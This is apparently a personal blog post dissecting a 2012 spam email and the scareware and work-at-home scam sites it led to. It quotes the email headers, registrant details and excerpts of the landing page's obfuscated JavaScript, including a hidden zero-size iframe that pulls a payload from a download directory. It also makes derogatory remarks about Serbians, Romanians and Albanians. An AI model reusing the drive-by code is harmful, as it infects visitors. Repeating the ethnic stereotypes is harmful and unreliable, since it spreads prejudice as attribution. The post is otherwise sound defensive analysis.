I recently got an email in my gmail account that did not get flagged by the SPAM filter and I thought I might go into a small explanation of what is going on for those out there that may be getting links in their email, but don’t know why.
The suspect email was from a client that I had made a website for in the past, and thus our previous correspondence kept google from flagging it as SPAM. The email simply had a link to what appeared to be an image on a blog. No big deal, but since it was sent to multiple people without any other words it was obviously not normal. The first thing to do is to view the actual email in original format. This lets you look at important information not available in a regular view. I have replaced all the names with placeholders. As you can see in the code below way more info is given. At first glance things look pretty cosher. The return path is the same address as the sender, the email went through a hotmail server which would makes sense since msn owns hotmail. @phx.gbl looks a little fishy, until I do a bit of research into legit emails coming from msn/ hotmail, turns out it is normal….
Message-ID: BAY147-W17544747B957A173463B9ECA160@phx.gbl
HOWEVER, I know something is up when I do a trace on:
X-Originating-IP: [178.223.132.199]
And I get the following results: Lattitude: 44.818611, Longitude: 20.468057 GMT+2
Hmmmmm…., That is an ISP by the name of Telekom Srbija Adsl operating out of Belgrade, Serbia!! The only legit thing to come out of Serbia is… ok, I don’t know.
Anyhow here is the whole email in the raw:
————————————————————————————————————
Delivered-To: XXXXXXX@gmail.com
Received: by 10.52.173.36 with SMTP id bh4csp84701vdc;
Thu, 10 May 2012 07:10:17 -0700 (PDT)
Received: by 10.50.10.225 with SMTP id l1mr2645909igb.1.1336659015564;
Thu, 10 May 2012 07:10:15 -0700 (PDT)
Return-Path:
Received: from bay0-omc3-s24.bay0.hotmail.com (bay0-omc3-s24.bay0.hotmail.com. [65.54.190.162])
by mx.google.com with ESMTP id gb6si1713633igc.61.2012.05.10.07.10.15;
Thu, 10 May 2012 07:10:15 -0700 (PDT)
Received-SPF: pass (google.com: domain of XXXXXXX@msn.com designates 65.54.190.162 as permitted sender) client-ip=65.54.190.162;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of XXXXXXX@msn.com designates 65.54.190.162 as permitted sender) smtp.mail=XXXXXXX@msn.com
Received: from BAY147-W17 ([65.54.190.189]) by bay0-omc3-s24.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);
Thu, 10 May 2012 07:09:46 -0700
Message-ID:
Return-Path: XXXXXXX@msn.com
Content-Type: multipart/alternative;
boundary=”_d0267811-62ef-48bf-9d36-2d29cb40d874_”
X-Originating-IP: [178.223.132.199]
From: XXXX XXXX
To:
Subject:
Date: Thu, 10 May 2012 07:09:46 -0700
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 10 May 2012 14:09:46.0808 (UTC) FILETIME=[8E307B80:01CD2EB6]
–_d0267811-62ef-48bf-9d36-2d29cb40d874_
Content-Type: text/plain; charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable
h t t p[:] / / projectorange.sg/wp-content/themes/twentyten/blog.php?total176.bmp
Ok, lets take a look at the link now that we are paranoid…
Projectorange.sg turns out to be legit enough despite the sketchy name:
Networksolutions tells me it was registered on 16-Dec-2010 and bought for two years. RARELY do cons and spammers want to own a domain for more than a month, let alone two whole years. The contact is yihan666@yahoo.com, oOooo evil… The DNS servers are with dreamhost.com and there doesn’t appear to be any dynamic dns or fast flux action going on which allows malware pushers to change the IP associated with a domain name every few minutes or hours so that shutting them down is a real pain.
Next I check out the site through URLvoid.com’s online tool which allows me to check for malware using multiple scanners at once. I’m already guessing this isn’t a nice .bmp image of a sunset from our Serbian friend (making an assumption.. in all reality he is probably from one of the former Soviet blocks and just bouncing off that server..)
URLVoid’s results.
0/30 (0.00%) CLEAN, IP Address: 67.205.55.145
Wow, could it be that it really is an innocent site? Hell no, The last time this was scanned was 5-5-2012, and I can assume the site got infected around the day I got my email ( 5-10-2012)
So I force URLVoid to rescan and…..wtf…. (0/31) CLEAN again!??! Maybe I should just go to the site? No. Why? First off, it came from Serbia. Do not trust them, just ask an Albanian.
So now I use URLVoid’s content dump tool to see what code is there without actually executing it myself. Out of all the code I’ll just point out some of the interesting bits… From a glance I can tell it is scareware that tells you your computer is infected and then when you click on their anti-virus product to clean your computer you actually download the viruses. Here are some of the funny bits.
————————————————————————————————————
<;div class="text1">;To help protect your computer, Windows Web Secure Kit have detected Trojans and ready to remove them.<;/div>;<;div class="virusname" id="hazardType">;
<;div class="virus_1_1">;noise.dat<;/div>;
<;div class="virus_1_1">;emptyregdb.dat<;/div>;
<;div class="virus_1_1">;mpr.dll<;/div>;
<;div class="virus_1_1">;ieakui.dll<;/div>;
<;div class="virus_1_1">;SET3.tmp<;/div>;
<;div class="virus_1_1">;country.sys<;/div>;
<;div class="virus_1_1">;ahui.exe<;/div>;
<;div class="virus_1_1">;popcinfo.dat<;/div>;
<;div class="virus_1_1">;dsdmo.dll<;/div>;
<;div class="virus_1_1">;Active Setup Log.txt<;/div>;
<;/div>;
Amazingly enough this website knows which of your files are infected without having access to your computer (remember I dumped the code from the URLVoid.com website….
function obu() {
var ff=navigator.userAgent;
var a="Firefox";
ff=ff.indexOf(a);
if (ff!=-1) ra2();
var o1 = ‘Y’+'o’+”+’ur’;
var o3 = ‘i’+'s a’+”+’t risk ‘;
var o4 = ‘o’+'f cr’+”+’ash. ‘;
var o5 = ‘Pr’+'ess’+”+’ CANCEL ‘;
var o6 = ‘t’+'o pre’+”+’vent it. ‘;
return o1+’ sy’+'s’+”+’tem ‘+o3+o4+o5+o6;
}
Here you can see some more obfuscation to avoid detection by scanners that pick up keywords for scareware and fake AV. Quite the creative way to say “Your System is at risk of crash. Press Cancel to prevent it.”
<;div class="text2" id="text2">;<;/div>;
<;div class="remove" onClick="ra2();return false;">;<;/div>;
<;div class="cancel" onClick="ra2();return false;">;<;/div>;
<;/div>;
Let the program remove the files, or say cancel, either way it is going to do the same thing! The power of choice…… That’s why you should always Ctrl + Alt + Delete your way out of a prompt. Also worth noting is that clicking on the link will bring you to the blog.php page since the .bmp image doesn’t exist. I could type in blog.php?blahblahblah.jpg and it still resolves to the blog.php code, the .bmp is just there to throw off victims and to make them think that they are going to view an image. In just the last 24 hours the attacker had modified his drive by download code from.
function rand1(){
var h1 = '<;if'+''+'rame ';
var i1 = 'src="down'+''+'load/" ';
var t1 = 'style="'+'';
var o1 = 'width: 0px; '+'';
var a1 = 'height: 0px; '+'';
var l1 = 'border: 0px;'+'';
var ll1 = l1+'">;<;/if'+''+'rame>;';
document.getElementById('rand1here').innerHTML = h1+i1+t1+o1+a1+ll1;
}
Which is an obfuscated way of inserting an invisible embedded page with the download/ directory in it which no doubt contains a payload. The obfuscation is to avoid detection techniques by HIDS, and AV/endpoint protection programs. It must be working because 0/31 AV vendors thought anything fishy was going on….
The attacker must of started to have his download numbers drop because today he replaced the obfuscated iframe code with just the last snippit:
function ra2(){ document.getElementById('raif').src='download/';
}
I hope it’s working out for him… The rest of the code is just a bs malware scanner that goes through random file names and pretends to be scanning as you are downloading the real virus. No lets go visit our attack code in a Virtual Machine that is running XP SP2 and the always vulnerable Internet Explorer. AV and firewall are off, let’s see what happens…..
An immediate re-direct to the7news.com with a forced download of Adobe Flash Player. The fake malware scanner didn’t pop up because it was probably looking for a certain IE that contains a common vulnerability. So it decided to go on to the next stage of the scam. The crooks appear to have taken the time to get their phony adobe flash Trojan digitally signed, or is this a legit flash installation? Going to Adobe and looking at their cert reveals everything appears to be the same except the file signing date is off. Adobe signed theirs in early April, but this was signed at the end of the month by Verisign. Odd, but maybe a new update/build came out at the end of the month… Once you run the real flash file it gives you the exe name Install_Flash_Player_AIH.exe and it is coming from the legit adobe server (aihdownload.adobe.com). However with the flash file being signed properly by Adobe it seems legit.. unless of course a certificate authority has been compromised (happened a few times last year).
Let’s dig on “the7news.com”
URLvoid says, 2/31 detected malware. What is alarming is that MOST of your normal scanners gave it a green light as infection free. The domain was bought on May 8th, or two days before I got the spam. Scanning the IP where it is located gives us the following info:
46.108.132.130
No location info… So we are probably dealing with a domain that has an IP changing constantly to avoid servers getting shut down. Compromised victim machines can be used to host both the domains and the malicious code that is being pushed.
The domain name itself?
The7news.com domain is owned by Mitich Vladko who resides in Buharest Romania and can be contacted at vladkomitill@ymail.com, no doubt just another honest Romanian trying to help people out with stay at home work schemes. Right…
The site has a large collection of .js popups designed to piss you off and get you to stay, but more than anything it is just an annoyance. If you click on any of the links you get directed by scams from businesssystemworld.com, obviously an affiliate getting kickback if they aren’t owned by the same person.
So lets figure out if the flash is legit or malware…
I’ve got netstat running on the victim box with an active connection to the suspected server (46.108.132.130) going. Let’s see if anything gets downloaded from another IP.
Surprisingly enough no outbound traffic occurred out of the norm and all signs point to it actually being a legit Flash Download. Which renews my faith in Verisign certificates. Ok, lets look at the businesssystemworld.com site that I am getting funneled towards. When I get there it says I need to get the NEWER version of flash. Newer than the legit new one I just got? I’m interested… Clicking on the flash prompts launches some javascript that forwards me to pay for this work at home kit. Which then takes me to an order form with an invalid certificate (which Internet Explorer caught. Don’t ignore certificate warnings.)
Oh, wow this cert was issued the day before I received my spam! These operations typically only last a week or two before they more on to the next set of domains. Notice that the cert is not trusted by the root Cert Authority. Basically it is like saying, yeah, it’s encrypted, but who the hell knows who is on the other side….
Once again, this IP (178.162.248.20) is traced back to no one. That’s not an accident… More to the point, they issued themself the certificate instead of a registered cert authority like Verisign.
The “legit” order form looks nice enough if you are gullible I suppose. I love all the emphasis on security.
I’m not going to go through with a purchase, but they probably do the one charge, then tack you onto a monthly plan to pay for something in the fine print. They typically don’t want to piss you off enough that you call your cc company to get a refund.
In my next post I will try to visit the initial attack code with a more vulnerable setup to actually get the malware on my system instead of merely being sent to a scam site. I’m also going to do a posting tomorrow to try to figure out what vulnerability on the original site led to his compromise.
